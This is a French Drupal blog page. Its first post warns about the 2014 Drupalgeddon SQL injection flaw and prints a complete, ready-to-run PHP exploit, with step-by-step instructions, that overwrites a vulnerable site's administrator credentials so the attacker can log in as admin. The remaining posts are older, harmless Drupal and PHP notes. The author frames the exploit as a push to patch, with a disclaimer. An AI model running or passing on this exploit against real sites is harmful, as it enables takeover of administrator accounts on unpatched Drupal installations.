Drupalgeddon : pourquoi vous devriez mettre à jour vos sites Drupal au plus vite.

0

Posted by florian | Posted in Drupal | Posted on 17-10-2014

Étiquettes : , , ,

Les drupaliens invétérés le savent bien depuis ce mercredi 15 octobre : une faille de sécurité hautement critique, de type injection SQL et répondant au doux nom de SA-CORE-2014-005, vient d’être rendue publique.

Cette fois-ci, c’est du sérieux. Jugez plutôt avec cet exploit trouvé sans trop chercher

Disclaimer : les informations qui suivent n’ont vocation qu’à illustrer le caractère critique de la faille de sécurité rapportée et n’engagent en aucun cas ma responsabilité.

Etape 1 : créer un fichier exploit.php avec le contenu suivant en modifiant au passage l’URL cible du site Drupal < 7.32 (dont vous êtes propriétaire, cela va sans dire) :

<?php

$url = 'http://www.mon-site.com'; // URL du site cible
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Ca a marché ! Tu peux t'authentifier avec l'utilisateur \"admin\" et le mot de passe \"admin\" sur {$url}user/login";
} else {
echo "Ca n'a pas marché : soit le site n'est pas vulnérable soit il n'a pu être chargé (problème de connexion Internet ?)...";
}

 

Etape 2 : exécuter le script

php exploit.php

 

Etape 3 : si le site est vulnérable, vous pouvez à présent vous authentifier sur http://www.mon-site.com/user/login avec le compte « admin », avec le mot de passe « admin ». Quelque peu flippant, n’est-ce pas ?..

 

Allez, qu’est-ce que tu attends ? File vite mettre à jour tes sites Drupal !..

Installer Drupal 7 en ligne de commande avec Drush

0

Posted by florian | Posted in Drupal | Posted on 20-10-2010

Étiquettes : , ,

Dans la vie d’un drupaler, la découverte de Drush s’apparente à la découverte du couteau par un néandertalien : bien des choses deviennent alors plus simples.

Parmi ces choses, on trouve la possibilité d’installer simplement un projet Drupal 7.
Lire la suite »

Downgrader PHP de 5.3.2 à 5.2.10 sur Ubuntu 10.04 « Lucid » LTS

5

Posted by florian | Posted in Logiciels Libres | Posted on 10-06-2010

Étiquettes : , , , , ,

Alors oui, Ubuntu est récemment sortie dans sa version 10.04 LTS, c’est super, on a tous sautillé de joie.

Problème : quand on est un drupaler de la première heure et qu’on maintient encore des sites sous Drupal 5 (pas toujours possible d’upgrader en 6 stable), on risque de cumuler les infortunes avec la version 5.3 de PHP que cette nouvelle mouture de notre distrib préférée nous apporte.

En pareil cas, la seule solution qui tienne la route est malheureusement de downgrader en version 5.2…

Hep ! Ne pars pas ! Ce n’est pas si compliqué !

Lire la suite »

Du bloc où tu veux, comme tu veux, quand tu veux.

0

Posted by florian | Posted in Logiciels Libres | Posted on 07-03-2010

Étiquettes : , , ,

((/public/news/logo-drupal.png|Logo Drupal|L|Logo Drupal)) J’ai beau chercher, je ne trouve pas de fonction du genre block_view() ou block_render() dans les entrailles de notre bon –vieux– Drupal 6, ni dans celles de notre Drupal 7 –flambard– flambant neuf d’ailleurs. Ca serait bien pratique pour injecter des blocs dans des nodes et autres callbacks… Différentes solutions sont proposées dans le handbook Drupal et sur divers blogs, soit à base d’appels à module_invoke(‘block’, ‘block’, ‘view’, …) soit à via l’installation d’un module contrib. Je trouve ça un peu laborieux pour faire quelque chose de simple, et qui d’ailleurs devrait avoir sa place dans block.module à mon sens (mais c’est un autre débat). Je te livre donc ici ma recette {{KISS}} maison, une fonction simple et efficace !
Lire la suite »

Le nouveau Mappy sur Drupal 6

0

Posted by florian | Posted in Logiciels Libres | Posted on 04-06-2009

Étiquettes : ,

[Mappy|http://fr.v3.mappy.com] a adopté [Drupal 6|http://www.drupal.org] pour la [version 3 de son site|http://fr.v3.mappy.com], actuellement en version beta. Il s’agit là d’une nouvelle référence majeure pour le [CMS et Framework PHP Drupal|http://www.drupal.org]. D’après ma rapide analyse, le site utilise a minima les modules suivants :%%% * issus de la communauté : cache, panels * spécifiques : mymappy, sitecrm, send_save_popup, poisearch, map

Drupal, PHP et les hooks SVN

0

Posted by florian | Posted in Logiciels Libres | Posted on 12-03-2009

Étiquettes : , , ,

((/public/news/drupal_logo.png|drupal_logo.png|L|Drupal PHP hooks Subversion SVN)) Tout développeur ([PHP|http://www.php.net] ou pas) normalement constitué –a recours– devrait recourir à l’utilisation de [Subversion|http://subversion.tigris.org] pour gérer les versions de ses applications, faciliter le travail en équipe ou encore mettre en oeuvre des processus de déploiements automatisés. Or, quel développeur n’a jamais publié un code contenant une erreur de syntaxe ?%%% Quel développeur n’a jamais fait un commit « barbare », sans aucun commentaire ?%%% Quel développeur n’aurait pas aimé être prévenu d’un commit pour éviter un conflit SVN ?
Lire la suite »

Drupal : et de 5 !

0

Posted by florian | Posted in Logiciels Libres | Posted on 15-01-2007

Étiquettes : ,

((/images/news/drupal_logo.png|Drupal 5.0|L)) Je vous en parlais [il y a tout juste un an|http://florian.cathala.org/index.php/2006/01/23/20-drupal|fr|Drupal], [Drupal|http://drupal.org|en|Drupal] est un ??CMS|Content Management System?? fort attachant, de part ses fonctionnalités de base, sa légèreté (à peine plus de 1 Mo !), sa robustesse et la [richesse de ses contributions|http://drupal.org/project/Modules|en|Drupal contribs modules]. Après deux « releases candidates », la [version 5.0|http://drupal.org/node/109495|en|Drupal 5.0] vient tout juste de sortir des fourneaux.
Lire la suite »

Drupal

4

Posted by florian | Posted in Logiciels Libres | Posted on 23-01-2006

Étiquettes : ,

((/images/news/drupal_logo.png|Drupal|C)) On le sait ??tous|nous autres les geeks??, il existe des tonnes de ??CMS|Content Management System??. Parmi les plus connus : [Plume|http://www.plume-cms.net/fr/], [Xoops|http://www.frxoops.org], [Joomla|http://www.joomla.org], [Typo3|http://typo3.org], [SPIP|http://www.spip.net/fr] … Et je suis tombé sur [Drupal|http://www.drupal.org], une formidable –usine à gaz– base de CMS, en fait un ??CMF|Content Management Framework??. Ce ??socle|framework en bon français?? de développement de sites est assez époustouflant par ses fonctionnalités de bases, mais surtout par les [modules additionnels|http://drupal.org/project/Modules], contributions d’??illustres développeurs inconnus|vive l’opensource??. Seule ombre au tableau : malgré l’ancienneté du projet, qui vient de fêter ses 5 ans, il n’y a encore que peu de sites fonctionnant sous [Drupal|http://www.drupal.org], ce qui le rend moins crédible qu’un [SPIP|http://www.spip.net/fr] et consors. Dommage …